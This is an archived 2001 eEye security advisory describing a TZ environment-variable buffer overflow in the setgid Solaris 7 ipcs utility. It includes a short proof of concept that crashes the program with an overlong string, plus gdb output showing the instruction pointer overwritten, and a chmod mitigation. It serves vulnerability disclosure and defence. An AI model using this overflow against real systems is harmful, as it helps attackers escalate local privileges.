Date: Thu, 12 Apr 2001 18:07:08 -0700 From: Marc Maiffret <marc@EEYE.COM> Subject: Solaris ipcs vulnerability
Solaris ipcs vulnerability
April 11, 2001
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.
Riley Hassell email@example.com
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility provided with Solaris 7. The problem exists in the parsing of the TZ (TIMEZONE) environment variable. By exploiting this vulnerability an attacker can achieve local sys group privileges. IPCS is used for gathering information on active inter-process communication facilities. Exploitation of this vulnerability would be very difficult, but not impossible.
bash-2.03$ TZ='perl -e 'print "A"x1035'' bash-2.03$ /usr/bin/i86/ipcs IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001 Message Queue facility inactive. T ID KEY MODE OWNER GROUP Shared Memory: m 0 0x500004d3 --rw-r--r-- root root Semaphore facility inactive. Segmentation Fault (core dumped) Note: [buffer] is any 1036 (or so) character string. A's... bash-2.03$ su root Password: # gdb /usr/bin/i86/ipcs core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are <snip> #0 0x41414141 in ?? () (gdb) info reg eip eip 0x41414141 0x41414141 (gdb)
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered.
chmod -s /usr/bin/i86/ipcs
This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone does exploit this vulnerability, they won?t gain higher privileges.
ADM, Ryan "shellcode ninja" Permeh, KAM, Lamagra, Zen-Parse, Loki, and last but not least- Speakeasy.net
Copyright (c) 1998-2001 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
Please send suggestions, updates, and comments to: